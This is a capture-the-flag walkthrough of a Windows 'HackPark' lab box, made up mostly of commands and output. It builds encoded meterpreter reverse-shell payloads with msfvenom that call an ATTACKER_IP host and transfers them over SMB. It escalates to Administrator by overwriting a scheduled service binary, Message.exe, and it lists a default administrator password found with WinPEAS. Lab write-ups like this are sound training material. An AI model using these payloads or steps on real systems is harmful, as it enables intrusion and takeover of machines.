Skip to main content

HackPark

MSFVENOM

  • Generating the PAYLOAD with MSFvenom after that we can Upload it to the BlogEngine using an SMB Server with our netcat Session.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=ATTACKER_IP LPORT=PORT -f exe -o Rev_Shell.exe

SMB

  • Using a Python SMB Server to Transfer files to the Target Machine.
attacker@machine:~$ smbserver LINUXSHARE /mnt/SMBShare

  • On the netcat sessions we go the Temp Directory and Download the Reverse Shell from our SMB Server.
C:\Windows\system32\inetsrv> cd "C:\Windows\Temp"
C:\Windows\Temp> copy \\10.10.169.216\LINUXSHARE\Rev_Shell.exe Rev_Shell.exe

  • After that we can Execute our Reverse Shell
C:\Windows\Temp> .\Rev_Shell.exe

Metasploit

  • Catching our Reverse Shell using Metasploit
  • Using: exploit/multi/handler
  • PAYLOAD: windows/meterpreter/reverse_tcp 
[*] Started reverse TCP handler on 10.10.20.30:5555 
[*] Sending stage (175686 bytes) to 10.10.76.79
[*] Meterpreter session 1 opened (10.10.20.30:5555 -> 10.10.76.79:49225) at 2022-10-10 06:29:06 +0200
  • We are Logged as: IIS APPPOOL\Blog
meterpreter > getuid 
Server username: IIS APPPOOL\Blog
meterpreter > sysinfo
Computer        : HACKPARK
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > shell

Enumeration

  • Enumerating with WinPeass we find an Unusual Service on the System WService.exe [System Scheduler]
  • We have Write Permissions on the Folder of the Service.
WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
File Permissions: Everyone [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: "C:\Program Files (x86)\SystemScheduler" (Everyone [WriteDataCreateFiles])
System Scheduler Service Wrapper


  • There is an Unusual Process Running Message.exe that belongs to System Scheduler
  • We can Replace Message.exe with a Reverse Shell to gain Higher Permissions on the Machine.
C:\Windows\Temp> tasklist /v
Image Name        PID   Session Name   Session   Mem Usage
===========       ===== ============   =======   =========  
[..]
Message.exe       2472                       1      7,180K
[..]
C:\Windows\Temp> where /r C:\ Message.exe
File Location: 'C:\Program Files (x86)\SystemScheduler\Message.exe'

C:\Windows\Temp> cd "C:\Program Files (x86)\SystemScheduler"
C:\Program Files (x86)\SystemScheduler> dir
[..]
10/09/2022  09:30 PM    <DIR>          Events
03/25/2018  10:58 AM           536,992 Message.exe
[..]
  • From the Logs we can see that Message.exe is running with Administrator Privileges.
C:\Program Files (x86)\SystemScheduler>cd Events
C:\Program Files (x86)\SystemScheduler\Events> dir
10/09/2022  09:31 PM            19,321 20198415519.INI_LOG.txt
C:\Program Files (x86)\SystemScheduler\Events> type 20198415519.INI_LOG.txt
08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)

PAYLOAD

  • Generating the PAYLOAD that will Replace Message.exe
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=ATTACKER_IP LPORT=PORT -f exe -o Message.exe

  • Once again we can Transfer the PAYLOAD to the Target Machine using a Python SMB Server.
C:\Program Files (x86)\SystemScheduler\Events> cd ..
C:\Program Files (x86)\SystemScheduler> copy \\10.10.20.30\LINUXSHARE\Message.exe Message.exe
Overwrite Message.exe? (Yes/No/All): Yes
        1 file(s) copied.

Exploitation

  • Using: exploit/multi/handler
  • PAYLOAD: windows/meterpreter/reverse_tcp
  • After replacing the Message.exe Binary we get a Reverse Shell after some Seconds.
[*] Started reverse TCP handler on 10.10.20.30:7777 
[*] Sending stage (175686 bytes) to 10.10.76.79
[*] Meterpreter session 1 opened (10.10.20.30:7777 -> 10.10.76.79:49237) at 2022-10-10 06:36:13 +0200

  • We have Administrator Rights: HACKPARK\Administrator
meterpreter > getuid 
Server username: HACKPARK\Administrator
meterpreter > sysinfo 
Computer        : HACKPARK
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows

OTHER [WinPEAS]

  • Found Default Administrator Credentials during an Enumeration with WinPEAS.
  • The Credentials can be used to Access the RDP (Remote Desktop Protocol).
DefaultUserName  :  administrator
DefaultPassword  :  4q6XvFES7Fdxs